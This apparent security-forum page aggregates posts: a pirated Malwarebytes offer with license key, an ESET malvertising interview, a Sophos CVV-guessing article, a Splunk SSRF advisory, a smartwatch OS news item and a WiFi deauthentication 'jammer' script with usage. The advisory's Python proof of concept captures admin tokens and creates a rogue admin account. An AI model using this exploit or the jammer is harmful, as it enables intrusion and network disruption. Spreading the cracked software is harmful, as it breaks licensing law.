  1. General information

    1. Important announcements

      Important announcements and the forum rules. Read the rules before posting.

    2. Welcome

      Welcome to the Romanian Security Team forum; you can introduce yourself here (optional)

    3. RST Projects

      Here you will find all the programs, tutorials, methods and exploits created by RST members

  2. Technical section

    1. Exploits

      The newest exploits, PoCs and shellcodes

    2. Challenges

      Challenges and wargames, for CTF enthusiasts

    3. Bug Bounty

      Category for discussions about sites that run a bug bounty program rewarding the people who report vulnerabilities to them

    4. Programming

      The programmers' corner: C/C++, Visual Basic, .NET, Java, ASM, shell scripting, Perl, Python

    5. Reverse engineering & exploit development

      Tutorials on malware analysis, samples, source code, useful programs, reverse engineering and exploit development

    6. Mobile phones

      Discussions about mobile phones, rooting, jailbreaking etc.

    7. Operating systems and hardware discussions

      Discussions about hardware, Windows, Unix, BSD etc.

    8. Electronics

      General discussions about electronics

    9. Wireless Pentesting

      Wardriving area, WiFi, Bluetooth and GSM hacking

  3. Tutorials

  4. Programs

    1. Hacking programs

      Post utilities here, such as sniffers, bruteforcers, fuzzers etc. No requests here.

    2. Security programs

      Post programs here such as firewalls, antivirus and similar software

    3. Useful programs

      Programs that do not fit the other sections: hacking or security

    4. Free stuff

      Various useful things, excluding roots, SMTPs, VPSs etc.

  5. General discussions

    1. RST Market

      Any sale/purchase related to online/banking fraud or unauthorized access is penalized with a permanent ban! Minimum 50 posts for access!

    2. Off-topic

      Discussions on various topics that do not fit the other categories. IT-related discussions only!

    3. Beginner discussions

      If you are a beginner, have a simple question or want to learn more about a field, this is the right section

    4. Security news

      News from the IT security field

    5. Help

      Have a problem we can help with? Post here.

    6. Requests

      Requests are made here only, regardless of subject.

    7. Suggestions

      Want a better forum? Every suggestion from you will be considered. Suggestions for the site/forum only.

    8. Links

      Post only security-related links here!

    9. Trash bin

      All topics that have drifted away from the answer will be moved here.

  • Posts

    • Malwarebytes Premium Multilingual + License Key
      FiLE SiZE: 71.26 MB


      Malwarebytes Premium 3 - Makes antivirus obsolete! Four layers of malware-crushing tech. Smarter detection. Specialized ransomware protection. It's the security you’ve been looking for.

      Real-time protection
      Detects malware automatically, before it can infect.

      Shields vulnerable systems and software from exploit attacks.

      Stops ransomware attacks before your data is held hostage.

      Malicious website protection
      Prevents access to and from known malicious webpages.

      Detects and removes malware and advanced threats.

      Removes rootkits and repairs the files they damage.

      What it does for you:

      Protects you from advanced threats
      Detects and removes malware in real-time with advanced anti-malware, anti-spyware, and anti-rootkit technology. Scans for the newest and most dangerous threats automatically, so you’re protected without having to even think about it.

      Protects your files from being locked and held for ransom
      Stops unknown and known ransomware with proprietary next-gen technology that works proactively to shield your files. This is a powerful, comprehensive defense that blocks ransomware, and not a simple decryption tool. So you’re protected from tomorrow’s "Ransomware Attack!" headlines today.

      Prevents your programs from being used against you
      Wraps your browser and software programs in four layers of defense, stopping attacks that use vulnerabilities in those programs to infect your computer.

      Protects you from fake and infected websites
      Detects and prevents contact with fake websites and malicious links. You are proactively protected from downloading malware, hacking attempts, and infected advertising. Worried about wandering into a "bad" Internet neighborhood? Now you don’t have to be.

      Scans faster, scans smarter
      Lightning-fast Hyper Scan mode targets only the threats that are currently active. Faster analysis. Still gets results. Run a scan in the background while you boot up your favorite game. It's done by the time you're ready to play.

      What's New ?

      Software Requirements:
      • Windows 10 (32/64-bit)
      • Windows 8.1 (32/64-bit)
      • Windows 8 (32/64-bit)
      • Windows 7 (32/64-bit)
      • Windows Vista (Service Pack 1 or later, 32/64-bit)*
      • Windows XP (Service Pack 3 or later, 32-bit only)*
      • Active Internet connection


      1 LiNKS | Part 1 GB | NO CRC | NO PASS

      If you like my post, don't forget to say Thanks and help keep the thread alive. Thank you!
    • Stegano exploit kit poisoning pixels

      Posted 6 Dec 2016, 12:00PM

      ESET researchers have discovered a new exploit kit spreading via malicious ads on a number of reputable news websites, each with millions of visitors daily. Since at least the beginning of October 2016, the bad guys have been targeting users of Internet Explorer and scanning their computers for vulnerabilities in Flash Player. Exploiting these flaws in the code, they have been attempting to download and execute various types of malware. The attacks fall into the category of so-called malvertising due to the fact that the malicious code has been distributed through advertising banners. To make things worse, the attackers responsible are using stealthy, even paranoid, techniques, which makes analysis quite complicated and has thus necessitated a separate in-depth analysis.

      I asked Robert Lipovsky, one of ESET’s senior malware researchers, to give us a less technical overview of the case.

      What does your discovery mean for internet users?

      It means that there are advertising banners with “poisoned pixels” leading to a new exploit kit, intended to enable the bad guys to remotely install malware onto victims’ computers. The victim doesn’t even need to click on the malicious ad content; all it takes is to visit a website displaying it. If the victim’s computer runs a vulnerable version of Flash Player, the machine will be compromised via an exploited vulnerability automatically. After that, the bad guys have all they need to download and execute the malware of their choice. Some of the payloads we analyzed include banking trojans, backdoors and spyware, but the victims could end up facing a nasty ransomware attack, for example. Once again this threat shows how important it is to have your software fully patched and to be protected by a reputable security solution. In this particular case, either of these measures fully protects you from this specific attack.

      Where are the poisoned pixels in this?

      Well, the name “Stegano” refers to steganography, which is a technique the bad guys used to hide parts of their malicious code in the pixels of the advertisements’ banners. Specifically, they hide it in the parameters controlling the transparency of each pixel. This makes only minor changes to the (color) tone of the picture, making the changes effectively invisible to the naked eye and so unnoticed by the potential victim.

      How does the attack work?

      I believe the following scheme is the best way to explain what is happening in this case: (diagram not reproduced)

      Your analysis shows that the creators of the Stegano exploit kit are trying hard to stay unseen. What makes them so paranoid?

      Attackers have succeeded in circumventing the countermeasures designed to uncover and block malicious content on advertising platforms, which has resulted in legitimate websites unknowingly serving infected content to millions of potential victims. On top of that, the malicious version of the ad is served only to a specific target group, selected by the attackers’ server. The decision-making logic behind the choice of target is unknown and this helps the bad guys to go further in dodging suspicion on the advertising platforms’ side. But those are not the only reasons why they try hard to stay stealthy – and that’s where the attackers get really paranoid. The crooks behind the Stegano exploit kit are also trying to stay off the radar of experienced cybersecurity research teams hunting for malware. Hiding code in the pixels would not be enough to escape this kind of attention, so they have implemented a series of checks to detect whether the code is being surveilled. If any kind of surveillance is detected, the exploit kit’s activities simply stop and no malicious content is served.

      How do they know when the code is being observed?

      The exploit kit mainly tries to detect whether or not it is sitting in a sandbox, or if it is running on a virtual machine that was created for detection purposes. Also, the malware checks for any security software that might be present and sends this information to its operators.

      Can you say how many users have already seen these banners with poisoned pixels?

      Our detection systems show that in the last two months the malicious ads have been displayed to more than a million users on several very popular websites. Bear in mind, this is a rather conservative estimate based only on our own telemetry from users participating in ESET LiveGrid®. After all, the visitor counts of some of these websites are in the millions daily.

      Can you be more specific? Which websites were affected?

      The purpose of this research is to shed light on the activities of the bad guys and to make users safe from this threat. In this case, disclosure of the websites known to have been affected wouldn’t add any extra value in this regard. On the contrary, it could provide a false sense of security to those who have not visited these sites, as the banners could have appeared on practically any website that displays ads. We should also mention the reputational harm this could inflict on victimized pages, especially since there is nothing they could have done to prevent these attacks, as the targeted ad space isn’t completely under their control.

      What should I do to stay protected from exploit kit attacks?

      First of all, let me highlight again that those who are diligent in protecting their computers are safe from these specific attacks. Keeping both the system and all applications patched and using a reliable internet security solution are strong precautions that help prevent such attacks. However, for unwary users, malvertising poses a serious threat, and their only hope is that malicious banners won’t make it onto websites they visit.

      Source: ESET WeLiveSecurity
    • Do NOT try this! How to guess credit card security codes

      If you’ve ever used your credit card online, or over the phone, you’ve probably been asked for something known informally as the “short code” or “security code”. That’s usually a three-digit number physically printed (but not embossed) at the right hand end of the signature strip on the back of your card. Three digits don’t sound like enough to provide much security, and in normal circumstances they wouldn’t be. But for what are known as card-not-present transactions, the CVV, or Card Verification Value as it is commonly known, provides a handy degree of protection against one of the most common sorts of credit card fraud, namely skimming.

      Skimming is where the crooks use a booby-trapped card reader, for example one glued onto an ATM, or cunningly squeezed into the card slot on a payment terminal, to read and record the magnetic stripe on your card. Even if you have a Chip and PIN card, the magstripe contains almost enough information for a crook to convince a website they have your card. For example, your name as it appears on the front of the card, the “long code”, usually 16 digits across the face of the card, and the expiry date are all there on the magstripe, ready to be copied surreptitiously and used on the web.

      The CVV therefore acts as a very low-tech barrier to card-not-present fraud, because most websites also require you to type in the CVV, which is not stored on the magstripe and therefore can’t be skimmed. Of course, there are numerous caveats here, including:

      The vendor mustn’t store your CVV after the transaction is complete. The security usefulness of the CVV depends on it never lying around where it could subsequently fall foul of cyberthieves.

      The payment processor mustn’t allow too many guesses at your CVV. With unlimited guesses and a three-digit code, even a crook working entirely by hand could try all the possibilities within a few hours.

      Guessing CVVs

      Researchers at Newcastle University in the UK recently decided to see just how effectively the second caveat was enforced. The initial findings were encouraging: after a few guesses on the same website, they’d end up locked out and unable to go any further. Then they tried what’s called a distributed attack, using a program to submit payment requests automatically to lots of websites at the same time. You can see where this is going.

      If each website gives you five guesses, then with 200 simultaneous guesses on a range of different websites, you can get through 1000 guesses (200 × 5) in quick order without triggering a block on any of the sites. And with 1000 guesses, you can cover all CVV possibilities from 000 to 999, stopping when you succeed. Then you can go to that 251st site and order just about whatever you like, because you’ve “solved” the CVV without ever actually seeing the victim’s card.

      In other words, you’d expect the payment processor’s back-end servers to keep track not just of the number of CVV guesses from each site, but the total number of guesses since your last successful purchase from any site. According to Newcastle University, Mastercard stopped this sort of distributed guessing, but Visa did not.

      Should you worry?

      Considering how much credit card fraud happens without any need for CVV-guessing tricks like this, we don’t think this is a signal to give up online purchases entirely this festive season. After all, if any of the sites or services you used recently kept your CVV, even if only to write it down temporarily while processing your transaction, you’re exposed anyway, so CVVs aren’t a significant barrier to determined crooks. And if you’ve ever put your card details into a hacked or fraudulent website – even (or perhaps especially) if the transaction was never finalised – then the crooks probably already have everything they need to clone your card.

      What to do?

      A few simple precautions will help, regardless of your card provider:

      Don’t let your card out of your sight. Crooks working out of sight, even for just a few seconds, can skim your card easily simply by running it through two readers. They can also snap a sneaky picture of the back of the card to record both your signature and the CVV.

      Try to use the Chip and PIN slot when paying in person. Most chip readers only require you to insert your card far enough to connect up to the chip. This leaves most of the magstripe sticking out, making skimming much harder. If in doubt, find another retailer or ATM.

      Most ATMs still require you to insert your whole card, and can therefore be fitted with glued-on magstripe skimmers. If you aren’t sure, why not get hold of it and give it a wiggle? Skimmers often don’t feel right, because they aren’t part of the original ATM.

      Stick to online retailers you trust. Check the address bar of the payment page, make sure you’re on an encrypted (HTTPS) site, and if you see any certificate warnings, bail out immediately.

      Keep an eye on your statements. If your bank has a service to send you a message notifying you when transactions take place, consider turning it on.

      Source: Sophos Naked Security
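A defender-side illustration of the distributed-guessing point made in the article above, added here and not part of the Sophos or Newcastle University material: a constructed processor-side limiter that counts CVV failures per card across every merchant, next to the per-site limiter that the distributed attack slips past. The card identifier, CVV, site names and limits are all constructed values.

```python
"""Processor-side CVV guess limiting versus per-merchant limiting.

Constructed example (not Sophos's or Newcastle University's code). Two
limiters are modelled: one that only counts failures per merchant site,
as the article says the tested sites did, and one that counts failures
per card across all sites since the last successful authorisation. A
constructed replay of the distributed attack shows the difference.
"""
from collections import defaultdict

PER_SITE_LIMIT = 5    # per-merchant guess allowance, as in the article
GLOBAL_LIMIT = 10     # constructed processor-wide cap per card
CARD = "CONSTRUCTED-CARD-0001"   # constructed card identifier


class PerSiteLimiter:
    """Counts failed CVV attempts per (card, site) only."""

    def __init__(self, limit=PER_SITE_LIMIT):
        self.limit = limit
        self.failures = defaultdict(int)

    def attempt(self, card, site, cvv, real_cvv):
        key = (card, site)
        if self.failures[key] >= self.limit:
            return "blocked"          # only this site refuses further guesses
        if cvv == real_cvv:
            self.failures[key] = 0
            return "ok"
        self.failures[key] += 1
        return "declined"


class ProcessorLimiter:
    """Counts failed CVV attempts per card across all sites. The counter
    resets only on a successful authorisation, so spreading guesses over
    many merchants does not help. Trade-off: once locked, the legitimate
    cardholder is refused too until the issuer reviews the card."""

    def __init__(self, limit=GLOBAL_LIMIT):
        self.limit = limit
        self.failures = defaultdict(int)

    def attempt(self, card, site, cvv, real_cvv):
        if self.failures[card] >= self.limit:
            return "blocked"          # card locked for every site
        if cvv == real_cvv:
            self.failures[card] = 0
            return "ok"
        self.failures[card] += 1
        return "declined"


def replay_distributed_attack(limiter, real_cvv="473", sites=200, per_site=5):
    """Constructed replay of the attack from the article: 5 guesses at each
    of 200 sites, walking the codes 000..999. Returns the number of guesses
    the processor actually evaluated and whether the CVV was found."""
    evaluated, code = 0, 0
    for s in range(sites):
        for _ in range(per_site):
            guess = f"{code:03d}"
            code += 1
            result = limiter.attempt(CARD, f"site{s}", guess, real_cvv)
            if result == "blocked":
                continue
            evaluated += 1
            if result == "ok":
                return evaluated, True
    return evaluated, False


if __name__ == "__main__":
    print("per-site limiter :", replay_distributed_attack(PerSiteLimiter()))
    print("processor limiter:", replay_distributed_attack(ProcessorLimiter()))
```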
    • From: Francesco Oddo <francesco.oddo () security-assessment com>
      Date: Fri, 9 Dec 2016 14:54:02 +1300

      Security-Assessment.com presents..

      Splunk Enterprise Server-Side Request Forgery

      Affected versions: Splunk Enterprise <= 6.4.3
      PDF:

      +-----------+
      |Description|
      +-----------+

      The Splunk Enterprise application is affected by a server-side request forgery vulnerability. This vulnerability can be exploited by an attacker via social engineering or other vectors to exfiltrate authentication tokens for the Splunk REST API to an external domain.

      +------------+
      |Exploitation|
      +------------+

      ==Server-Side Request Forgery==

      A server-side request forgery (SSRF) vulnerability exists in the Splunk Enterprise web management interface within the Alert functionality. The application parses user supplied data in the GET parameter ‘alerts_id’ to construct an HTTP request to the splunkd daemon listening on TCP port 8089. Since no validation is carried out on the parameter, an attacker can specify an external domain and force the application to make an HTTP request to an arbitrary destination host. The issue is aggravated by the fact that the application includes the REST API token for the currently authenticated user within the Authorization request header. This vulnerability can be exploited via social engineering to obtain unauthorized access to the Splunk REST API with the same privilege level of the captured API token.

      [POC SSRF LINK]
      /en-US/alerts/launcher?*&severity=*&alerts_id=[DOMAIN]&search=test

      The proof of concept below can be used to listen for SSRF connections and automatically create a malicious privileged user when an administrative token is captured.

      [POC -]

      from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
      import httplib
      import ssl
      import requests

      token = ''

      class MyHandler(BaseHTTPRequestHandler):
          # Receives the SSRF callback and keeps whatever follows "Splunk " in the Authorization header
          def do_GET(self):
              global token
              try:
                  token = self.headers.get('Authorization')[7:]
                  print "[+] Captured Splunk API token from GET request"
              except Exception, e:
                  print "[-] No API token captured on incoming connection..."

      def adminTokenNotCaptured():
          # Queries splunkd with the captured token to check whether it belongs to the admin user
          global token
          if token:
              query = "/services/authentication/httpauth-tokens/" + token
              conn = httplib.HTTPSConnection("<SPLUNK IP>", 8089, context=ssl._create_unverified_context())
              conn.putrequest("GET", query)
              conn.putheader("Authorization", "Splunk %s" % token)
              conn.endheaders()
              context = conn.getresponse().read()
              if 'userName">admin' in context:
                  print "[+] Confirmed Splunk API token belongs to admin user"
                  print "[+] Admin Splunk API Token: %s" % token
                  return False
              else:
                  print "[!] Splunk API token does not belong to admin user"
          return True

      def poc():
          global token
          create_user_uri = "https://<SPLUNK IP>:8089/services/authentication/users"
          params = {'name': 'infosec', 'password': 'password', 'roles': 'admin'}
          auth_header = {'Authorization': 'Splunk %s' % token}
          requests.packages.urllib3.disable_warnings()
          response = requests.post(create_user_uri, data=params, headers=auth_header, verify=False)
          if "<title>infosec" in response.content:
              print "[+] POC admin account 'infosec:password' successfully created"
          else:
              print "[-] No account was created"
              print response.content

      if __name__ == "__main__":
          try:
              print "[+] Starting HTTP Listener"
              server = HTTPServer(("", 8080), MyHandler)
              while adminTokenNotCaptured():
                  server.handle_request()
              poc()
          except KeyboardInterrupt:
              print "[+] Stopping HTTP Listener"
              server.socket.close()

      +----------+
      | Solution |
      +----------+

      Update to Splunk 6.5.0 or later. Full information about all patched versions is provided in the reference links below.

      +------------+
      | Timeline |
      +------------+

      24/08/2016 – Initial disclosure to vendor
      25/08/2016 – Vendor acknowledges receipt of the advisory and confirms vulnerability.
      28/09/2016 – Sent follow up email asking for status update
      30/09/2016 – Vendor replies fixes are being backported to all supported versions of the software.
      10/11/2016 – Vendor releases security advisory and patched software versions
      09/12/2016 – Public disclosure

      +------------+
      | Additional |
      +------------+

      [SPL-128840]

      Source: Security-Assessment.com advisory
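The mitigation side of the SSRF described in the advisory above, as an added illustration that is not Splunk's code: a hypothetical web tier that turns the alerts_id parameter into a request to a local splunkd on TCP 8089 and attaches the user's REST token. build_vulnerable reconstructs the unvalidated pattern the advisory describes; build_hardened and outgoing_headers show the two checks that close it. The splunkd origin, the REST path and the identifier regex are assumptions.

```python
"""Pinning the splunkd destination for a user-supplied alerts_id.

Added illustration, not Splunk's code. Host, path and regex are assumed.
"""
import re
from urllib.parse import urljoin, urlsplit, quote

SPLUNKD_ORIGIN = "https://127.0.0.1:8089"     # assumed local daemon location
ALERTS_PATH = "/services/saved/searches/"      # assumed REST path
# Identifier only: must start alphanumeric, so "", "..", "//host" and "http:"
# can never pass.
ALERTS_ID_RE = re.compile(r"[A-Za-z0-9][A-Za-z0-9_.-]{0,127}")


def same_origin(url: str) -> bool:
    """True only when the request would still go to the pinned splunkd."""
    parts, pinned = urlsplit(url), urlsplit(SPLUNKD_ORIGIN)
    return parts.scheme == pinned.scheme and parts.netloc == pinned.netloc


def build_vulnerable(alerts_id: str) -> str:
    # Hypothetical reconstruction of the flawed pattern: the parameter is
    # resolved as a URL reference. "//evil.example/x" or an absolute URL
    # replaces the host, so the request leaves the box with the token attached.
    return urljoin(SPLUNKD_ORIGIN + ALERTS_PATH, alerts_id)


def build_hardened(alerts_id: str) -> str:
    # 1. Accept only a plain identifier: no slashes, colons or scheme.
    if not ALERTS_ID_RE.fullmatch(alerts_id):
        raise ValueError("alerts_id must be a plain identifier")
    # 2. Encode it as a single path segment under the pinned origin.
    url = SPLUNKD_ORIGIN + ALERTS_PATH + quote(alerts_id, safe="")
    # 3. Defence in depth: re-check the destination before sending.
    if not same_origin(url):
        raise ValueError("destination left the splunkd origin")
    return url


def hardened_rejects(alerts_id: str) -> bool:
    """Does the hardened builder refuse this value?"""
    try:
        build_hardened(alerts_id)
    except ValueError:
        return True
    return False


def outgoing_headers(url: str, api_token: str) -> dict:
    """Attach the REST token only to requests bound for the pinned splunkd,
    so a missed validation elsewhere cannot leak it to another host."""
    headers = {"Accept": "application/json"}
    if same_origin(url):
        headers["Authorization"] = "Splunk " + api_token
    return headers


if __name__ == "__main__":
    for value in ("my_alert", "//evil.example/collect", "http://evil.example/"):
        print(repr(value), "->", build_vulnerable(value), "| rejected:", hardened_rejects(value))
```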
    • New Smartwatch OS Debuts on GitHub
      By John P. Mello Jr.
      Dec 9, 2016 7:00 AM PT

      Can a new smartwatch operating system based on Linux breathe some new life into the smart wearables market? Florent Revest hopes so. Revest, a French computer science student, on Wednesday announced the alpha release of AsteroidOS, an open source operating system that will run on several Android smartwatch models.

      "Many users believe that the current proprietary platforms can not guarantee a satisfactory level of control over their privacy and hardware," noted Revest, who has been working on his OS for two years. "Hence, I noticed a need for an open wearable platform and AsteroidOS is my attempt to address this issue."

      The alpha edition of AsteroidOS contains some basic apps: agenda, for scheduling events to remember; an alarm clock; a calculator; music, for controlling the music player on a phone; a stopwatch; a timer and a weather app.

      The OS will run, more or less, on the LG G Watch, LG G Urbane, Asus ZenWatch 2 and Sony Smartwatch 3, Revest noted. Bluetooth works only on the G Watch, though.

      Uphill Battle

      Launching an open source mobile operating system can be a daunting and seemingly futile task. "This has been tried repeatedly in the past and has failed," said Jack E. Gold, principal analyst.

      So far there's only been one open source success story in the mobile market, and that's been Android -- which eventually was consumed by Google and closed off, noted Patrick Moorhead, principal analyst at Moor Insights and Strategy. "Firefox, Meego and Ubuntu have tried this and, unfortunately, haven't met with success," he told LinuxInsider.

      Breaking From Past

      However, Revest's focus on smartwatches may give his OS a better chance of success than past open source efforts had, said Charles King, principal analyst. "There's certainly no guarantee that AsteroidOS can breathe life into so stagnant a market -- but at the same time, the new OS won't encounter the barriers it would in more mature markets, such as smartphones," he told LinuxInsider. "There's a hole in the market for this," said Ross Rubin, principal analyst.

      "Unlike the phone and tablet market, where you can use the Android open source platform and build something based on that, there really hasn't been much for smartwatches," he told LinuxInsider. Google offers a form of Android for wearables, but it can't be modified the way the open source version of Android can.

      Narrow Appeal

      While Revest envisions growth of AsteroidOS as an open source community builds around it and it becomes compatible with more devices, broad adoption may be a long shot. Manufacturers who produce custom phones for target markets, such as low cost phones for emerging markets, might be interested in AsteroidOS, suggested Gold. However, "you can do this with Android-Linux already," he told LinuxInsider, "and with a new OS, there will be no availability of apps, so the devices will be very unattractive."

      Chinese phone makers who use open source Android may use AsteroidOS to produce very inexpensive smartwatches, said Rubin, "but inexpensive smartwatches haven't been driving the market. Pebble was an inexpensive smartwatch, and look what happened to it." The early adopters of the OS will be Linux enthusiasts and hobbyists, King said. Since the OS can work on older watches, early users likely will run the software on second-hand hardware.

      "That's a dynamic that drove significant early interest in Linux during the mid- to late-1990s, when people ported the OS to a wide variety of x86-based PCs and servers that were well past their prime," King recalled. Many of the initial users of AsteroidOS likely will be developers and Linux evangelists, he said. "If AsteroidOS can gain a foothold with them, it could well spark commercial interest and adoption further down the road."

      Pebble Crushed

      Revest's announcement came on the same day that news broke that one of the pioneers in the smartwatch market, Pebble, has been purchased by Fitbit, reportedly for US$40 million. Fitbit, a fitness band maker, made the purchase to acquire key personnel and intellectual property. The deal does not include Fitbit's hardware, which will be discontinued.

      The smartwatch market took a tumble in the third quarter, according to IDC. Shipments of wearable products were up 3.1 percent -- to 23.0 million from 22.3 million in the same quarter a year ago -- the firm reported earlier this week. "It's still early days, but we're already seeing a notable shift in the market," observed IDC Senior Research Analyst Jitesh Ubrani. "Where smartwatches were once expected to take the lead, basic wearables now reign supreme."

      John Mello is a freelance technology writer and contributor to Chief Security Officer magazine.

      Source: LinuxInsider
    • jammer

      A Bash script to automate the continuous circular deauthentication of all the wifi networks in your reach.

      I am not responsible for any misuses of the script. Keep in mind that it is generally illegal to use the script at your neighborhood. It is designed for pen-testing purposes. It has only been tested on my two machines, so there may still be bugs that can even cause data loss. That's why I suggest you take a good look at the code before you execute it. There will be updates as soon as I fix something or make a nice improvement. Not that anyone will see this.

      Jammer v0.3
      Usage: jammer [OPTION] ...
      Jam Wifi Networks That Your Wireless Card Can Reach.

        -d, --deauths:   Set the number of deauthentications for each station. Default is 10
        -y, --yes:       Make 'Yes' the answer for everything the script asks
        -s, --endless:   When reaching the end of the list, start again
        -f, --whitelist: A file with ESSID's to ignore during the attack
        -k, --keep:      Keep the scan files after the script ends
        -n, --name:      Choose the names the scan files are saved as
        -e, --ethernet:  Set the name for the ethernet interface. Default is 'eth0'
        -w, --wireless:  Set the name for the wireless interface. Default is 'wlan0'
        -h, --help:      Show this help message

      Looking at this help message, a suggested way to call the script is

        $ sudo ./jammer -y -s -d 20 -f whitelist.txt

      Source: the project's repository
    • Learn better what Linux is made of. Architectures, kernel modules, kernel sysinternals, security, daemons, structure, and as far as possible install your applications from source at first. At least, focus on building things at first. Don't waste your time on breaking things.